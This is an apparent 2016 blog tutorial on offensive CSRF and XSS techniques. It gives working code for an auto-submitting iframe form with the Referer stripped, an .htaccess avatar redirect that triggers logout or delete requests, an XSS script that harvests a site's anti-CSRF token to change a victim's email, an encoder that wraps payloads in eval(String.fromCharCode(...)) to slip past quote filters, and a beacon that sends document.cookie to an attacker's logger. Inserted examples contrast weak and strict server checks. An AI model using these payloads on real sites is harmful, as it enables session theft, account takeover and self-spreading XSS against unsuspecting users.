
Published on June 4th, 2016


Going a little bit deeper into CSRF and XSS


You need to know more than the basics of XSS and CSRF to get any use out of this text.

HOW TO CLEAN THE REFERRER

Sometimes, when you have a CSRF exploit ready, you notice that the request gets rejected if the Referer is not the domain the exploit posts to. What you have to do then is clean the referrer, i.e. make the browser send the request without any Referer header at all.

To do this, put the form in an iframe whose src is a javascript: URL:

<iframe width="300" height="400" src="javascript:'<form action=https://yay.net/login.php method=post><input type=text name=username value=test><input type=text name=password value=testdd></form><script>document.forms[0].submit()</script>'"></iframe>

This code creates an iframe with a javascript: URL, builds the form on that blank page, and submits it. The page created this way has the URL about:blank, and browsers send no Referer for requests made from such a document, so the submission arrives with a clean (empty) referrer and any check of the form "reject if the Referer is some other domain" is circumvented.

Two caveats: the Origin header, which browsers add to cross-site POSTs, is not blanked by this trick (the blank frame inherits the origin of your page), so a site that checks Origin instead of Referer is not fooled; and cookies marked SameSite are not attached to the cross-site submission in the first place.

If they don't even accept blank referrers, I don't think there's anything you can do about it.
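To make the distinction concrete, here is an added example (not code from the original post) of the two server-side checks described above, written as Node.js functions: the lenient one that the iframe trick defeats and the strict one that it does not. The allowed host yay.net is taken from the form above; the header sets are constructed.

```javascript
// Added example, not from the original post. Two server-side Referer policies
// for a state-changing request such as the login form submitted above.
const ALLOWED_HOST = 'yay.net'; // the site the exploit posts to (from the form above)

function hostOf(urlString) {
  try {
    return new URL(urlString).host;
  } catch (e) {
    return null; // a malformed or missing header never counts as the allowed host
  }
}

// Weak policy: only reject when a Referer is present AND names another site.
// A form submitted from a javascript: (about:blank) iframe carries no Referer,
// so it passes this check.
function lenientRefererCheck(headers) {
  if (!headers.referer) return true;
  return hostOf(headers.referer) === ALLOWED_HOST;
}

// Strict policy: the request must name the site in Origin (preferred, since
// browsers add it to cross-site POSTs) or, failing that, in Referer; an absent
// source is a failure. This is the "don't even accept blank referrers" case.
function strictSourceCheck(headers) {
  const source = headers.origin || headers.referer;
  if (!source) return false;
  return hostOf(source) === ALLOWED_HOST;
}

// Constructed header sets, as the server would see them.
const fromSiteItself = { referer: 'https://yay.net/profile', origin: 'https://yay.net' };
const fromAttackerPage = { referer: 'https://attacker.example/csrf.html', origin: 'https://attacker.example' };
// The iframe trick: Referer is gone, but the blank frame inherits the
// embedding page's origin, so Origin is still sent on the cross-site POST.
const fromBlankIframe = { origin: 'https://attacker.example' };

function demoReferer() {
  const requests = [fromSiteItself, fromAttackerPage, fromBlankIframe];
  return {
    lenient: requests.map((h) => lenientRefererCheck(h)), // [true, false, true]
    strict: requests.map((h) => strictSourceCheck(h)),    // [true, false, false]
  };
}
```

The third entry is the one that matters: the lenient check lets the blank-referrer submission through, the strict check rejects it because the Origin header still names the attacker's page.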

HOW TO CIRCUMVENT FILE EXTENSION CHECKS

On forums and online communities you can often set an avatar that is linked from the web, and very often only extensions like .jpg and .png are allowed. The filter only looks at the end of the URL string, though, not at what the URL actually serves, so what you do then is use Apache's .htaccess.

Make a folder on your webspace (here called /avatar) and put a .htaccess file in it with the following content. The first argument of Redirect is the path as seen from the document root, and AllowOverride must permit FileInfo for the directive to be honoured:

Redirect 301 /avatar/pic.jpg https://yay.net/logout.php

Then enter https://yay.com/avatar/pic.jpg as your avatar. The extension filter does not trigger. But when the image is displayed, the browser gets the HTTP 301 redirect and fetches the new URL, sending the victim's cookies for that site along with the request. (Without the explicit 301, Redirect sends a 302; either works here.)

This way, you can redirect to logout.php or delete.php?id=34 etc.

Note that this cannot be used for POST CSRF exploits. The browser is fetching an <img>, so the request after the redirect is still a GET, and the response is decoded as image data, never rendered as HTML, so an auto-submitting form in it would never run.

Additionally you can do fun stuff like redirecting to mailto:evil_popup or other protocols (browser-dependent). Redirecting to javascript: does not work though, and thank god for that.
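As an added example that is not from the original post, here is the check the trick defeats beside the one it does not: a suffix test on the avatar URL string, and a check on what the URL actually serves when fetched with redirects disabled. The response objects are constructed to mirror what the .htaccess above makes pic.jpg return; a server-side fetcher that surfaces the raw 3xx status is assumed.

```javascript
// Added example, not from the original post. The suffix filter the trick
// defeats, beside a check on what the avatar URL actually serves.
const IMAGE_EXTENSIONS = /\.(jpe?g|png|gif)$/i;

// Weak: the usual forum check, a test on the user-supplied string only.
// "https://yay.com/avatar/pic.jpg" passes although the server answers with
// a 301 to logout.php.
function extensionOnlyFilter(avatarUrl) {
  return IMAGE_EXTENSIONS.test(avatarUrl);
}

// Hardened: the server fetches the URL itself with redirects disabled
// (e.g. fetch(url, { redirect: 'manual' }) in Node, assumed to surface the raw
// status) and accepts only a direct 200 whose Content-Type is an image.
function acceptsServedAvatar(response) {
  if (response.status !== 200) return false; // any 3xx, including the 301 above, fails here
  const type = String(response.headers['content-type'] || '').toLowerCase();
  return type.startsWith('image/');
}

// Constructed responses standing in for the fetch results.
const redirectFromHtaccess = {
  status: 301,
  headers: { location: 'https://yay.net/logout.php', 'content-type': 'text/html' },
};
const genuineImage = { status: 200, headers: { 'content-type': 'image/jpeg' } };
const htmlNamedLikeAnImage = { status: 200, headers: { 'content-type': 'text/html' } };

function demoAvatarChecks() {
  return {
    urlPasses: extensionOnlyFilter('https://yay.com/avatar/pic.jpg'), // true: filter fooled
    redirectAccepted: acceptsServedAvatar(redirectFromHtaccess),      // false
    imageAccepted: acceptsServedAvatar(genuineImage),                 // true
    htmlAccepted: acceptsServedAvatar(htmlNamedLikeAnImage),          // false
  };
}
```

Checking the served response closes the redirect hole, but the file behind a hotlinked URL can still change later; the robust fix is to download and re-encode the image once and serve the copy yourself.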

HOW TO DO CSRF WHEN THERE ARE TOKEN CHECKS

If you make a CSRF exploit which changes name, email or whatever, you may see that the site uses tokens to prevent this. To circumvent this you need to find an XSS flaw on the same site. Once you have one, you can inject JS which runs in the victim's session on the target domain and, since it is same-origin, can fetch the page that contains the token and read it out.

Take a look at this code: https://pastebin.com/m7203ede5

This code queries /editprofile. The HTML of that page contains the token which is needed to change things.

This is the most interesting part:

data = ajaxRequest.responseText;
k = data.match("[0-9]{32}")[0];

This is a regular expression. It searches the HTML for a run of exactly 32 digits; there is only one number that long on the page, and that is our token. (match() returns an array, so the token itself is element 0. If the page has any other run of 32 or more digits, the pattern matches the first one, so in that case anchor the pattern on the input field that holds the token instead.)

The token is now stored in the variable k. Then you use that token in another AJAX request, or you create a new form dynamically and submit it. The point is, with the fetched token you can do what you want: change email, password, delete the account, change status etc.

This token fetching is very often needed when creating an XSS worm.
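The following is an added example, not the pastebin code the post links to, that carries the token flow through in JavaScript: the post's 32-digit match, a version anchored on the hidden input that holds the token, and the body of the follow-up request. The profile page layout, the field name token and the /editprofile URL are assumptions; the HTML is constructed and deliberately contains a longer digit run before the token to show why anchoring matters.

```javascript
// Added example, not the pastebin code the post links to. Token harvesting
// for a CSRF request protected by a per-session token, using assumed names.

// Constructed stand-in for the response body of GET /editprofile. It contains
// a 35-digit account id before the token on purpose, to show the pitfall below.
const SAMPLE_PROFILE_HTML = `
<html><body>
<div id="uid">account 12345678901234567890123456789012345</div>
<form action="/editprofile" method="post">
  <input type="hidden" name="token" value="48293017465819203746582910374658">
  <input type="text" name="email" value="victim@example.com">
  <input type="submit" value="Save">
</form>
</body></html>`;

// The post's approach: the first run of 32 digits anywhere in the page.
// Here it grabs the first 32 digits of the account id, not the token.
function naiveTokenMatch(html) {
  const m = html.match(/[0-9]{32}/);
  return m ? m[0] : null;
}

// Anchored approach: read the value of the hidden <input> whose name is the
// token field (assumed to be "token", with the name attribute before value).
function tokenFromHiddenInput(html, fieldName = 'token') {
  const re = new RegExp(
    `<input[^>]*\\bname=["']?${fieldName}["']?[^>]*\\bvalue=["']?([A-Za-z0-9]+)`,
    'i'
  );
  const m = html.match(re);
  return m ? m[1] : null;
}

// Body of the second request, carrying the harvested token plus the change.
function buildProfileUpdate(token, changes) {
  return new URLSearchParams({ token, ...changes }).toString();
}

// The two requests as the injected script would issue them in the victim's
// browser; same-origin, so the session cookies ride along. Not executed in
// this file (there is no browser here).
async function changeEmailViaXss(newEmail) {
  const page = await fetch('/editprofile', { credentials: 'include' });
  const token = tokenFromHiddenInput(await page.text());
  if (!token) throw new Error('token not found on /editprofile');
  return fetch('/editprofile', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildProfileUpdate(token, { email: newEmail }),
  });
}
```

On the sample page the naive match returns the first 32 digits of the account id while the anchored version returns the real token; a worm that trusted the naive result would post an invalid token on every victim.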

WHAT TO DO IF QUOTES ARE FILTERED AWAY

Very often you find that " and ' are escaped, replaced or removed. In that case, code like this won't work:

document.location.href="https://csrf"

because the " are escaped.

To write code which has no " or ' in it, you can use JavaScript's String.fromCharCode(), which builds a string from a list of character codes.

Use this tool to encode your JS: https://www.wocares.com/noquote.php

E.g. to make alert("yo") work without quotes, the code would be like this (97,108,101,114,116 spell alert, 40 is the opening parenthesis, 34 is the double quote, 121 and 111 are y and o, 41 is the closing parenthesis):

String.fromCharCode(97,108,101,114,116,40,34,121,111,34,41)

This code alone won't make the alert fire; it only builds the string alert("yo"). You need to wrap it in eval(), like this:

eval(String.fromCharCode(97,108,101,114,116,40,34,121,111,34,41))
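As an added example (not from the post or the linked tool), here is the encoder itself: it turns any snippet into the eval(String.fromCharCode(...)) form, a check confirms the result contains no quote characters, and a round trip evaluates the encoded form without a browser. The payloads are constructed; the encoder goes beyond the post's alert example in that it encodes every UTF-16 code unit, so it works for any snippet.

```javascript
// Added example, not from the original post or the linked tool. Encoder for
// the quote-free eval(String.fromCharCode(...)) wrapper described above.

// Every UTF-16 code unit becomes one argument, so the result round-trips for
// any JavaScript source, not only ASCII.
function toCharCodeCall(source) {
  const codes = [];
  for (let i = 0; i < source.length; i++) codes.push(source.charCodeAt(i));
  return `eval(String.fromCharCode(${codes.join(',')}))`;
}

// The property the filter cares about: no ", ' or ` anywhere in the payload.
function containsQuotes(text) {
  return /["'`]/.test(text);
}

// Constructed payloads.
const POST_EXAMPLE = 'alert("yo")';
const ENCODED_ALERT = toCharCodeCall(POST_EXAMPLE);
// eval(String.fromCharCode(97,108,101,114,116,40,34,121,111,34,41))

// Round trip without a browser: a snippet whose quotes the filter would eat.
// eval is used here only because the technique under discussion relies on it.
function roundTrip(source) {
  return eval(toCharCodeCall(source));
}
```

If eval itself is filtered as well, the same quote-free string can be handed to setTimeout() or the Function constructor instead, both of which also execute source given as a string.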

HOW TO SILENTLY STEAL COOKIES

Sending the victim to your logger with document.location.href is quite noisy: the page visibly navigates away, and people will understand that something not good is happening. But there is a way to send the cookies off silently:

new Image().src='https://yourserver/logger.php?cookie='+encodeURIComponent(document.cookie)

This won't send the user anywhere; the browser just requests the "image" in the background, which delivers the cookies to your server. Encoding the cookie string matters because document.cookie contains ; and = and may contain & or #, which would otherwise be split off or cut off by the query-string parsing. Note that cookies set with the HttpOnly flag are not readable from document.cookie at all, so this only gets the ones without it.
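Added example (not code from the original post): build the beacon URL both ways and show what the receiving logger actually recovers from each. The logger host is a placeholder and the cookie string is constructed to contain the characters that break a raw query string.

```javascript
// Added example, not from the original post. The beacon URL with and without
// encoding, and what the logger recovers from each.
const LOGGER = 'https://yourserver.example/logger.php'; // placeholder host

function beaconUrlRaw(cookieString) {
  return LOGGER + '?cookie=' + cookieString;
}

function beaconUrlEncoded(cookieString) {
  return LOGGER + '?cookie=' + encodeURIComponent(cookieString);
}

// What logger.php gets when it reads the "cookie" query parameter.
function loggerRecovers(url) {
  return new URL(url).searchParams.get('cookie');
}

// Constructed document.cookie value with the characters that break a raw query
// string: ';' and '=' between cookies, '&' (splits the parameter) and
// '#' (starts the fragment, which the browser never sends to the server).
const COOKIE = 'sess=abc123; theme=dark&compact; note=50%off #1';

// In the victim's browser the beacon is fired as the post shows, but encoded.
// Guarded so the file also runs under Node for the checks below.
function fireBeacon(cookieString) {
  if (typeof Image === 'undefined') return null;
  const img = new Image();
  img.src = beaconUrlEncoded(cookieString);
  return img.src;
}

function demoBeacon() {
  return {
    raw: loggerRecovers(beaconUrlRaw(COOKIE)),         // 'sess=abc123; theme=dark' (rest lost)
    encoded: loggerRecovers(beaconUrlEncoded(COOKIE)), // the full cookie string
  };
}
```

The raw variant loses everything from the first & onwards and never transmits the part after #; the encoded variant round-trips the whole cookie string.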

FINAL WORDS

I hope you learned something from this text, and that you give it a 10/10.

If the feedback is good, I am going to write more advanced stuff on this subject 🙂
Feedback on the language/grammar is also wanted, because English isn't my main language.


@RAPTOR


